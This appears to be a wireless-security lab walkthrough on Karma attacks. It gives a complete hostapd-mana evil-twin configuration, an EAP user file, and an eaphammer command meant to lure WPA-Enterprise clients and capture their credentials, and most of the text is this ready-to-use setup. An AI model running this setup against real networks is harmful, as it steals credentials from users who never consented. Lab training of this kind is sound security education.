Karma Attacks

Mana

Two dual-band WiFi interfaces are available on the lab machine. A few WiFi clients are present in the vicinity of the lab machine and probing for different networks. It is known that the probed networks are using WPA-ENT security configuration.

Objective: Deploy an evil twin using Hostapd-mana which can perform Karma attack and make multiple clients join its network simultaneously. And, retrieve the credentials

Do the usual iw dev dance and check for netwoks with airodump-ng.

You can see that there are two clients probing

Create the config file as per below:

interface=wlan1
ssid=FreeInternet
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1
enable_mana=1

Create the user file:

* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP
"1234test" [2]

Start hostapd-mana with the config file and observer the client credentials in the log

EAPHammer

Same iw dev dance as above.

EAPHammer

Sam iw dev dance as above, but this time start EAPHammer.

./eaphammer -i wlan1 --essid FreeInternet -c 1 --auth wpa-eap --karma

./eaphammer -i wlan1 --essid FreeInternet -c 1 --auth wpa-eap --karma

Observe the clients creds in the log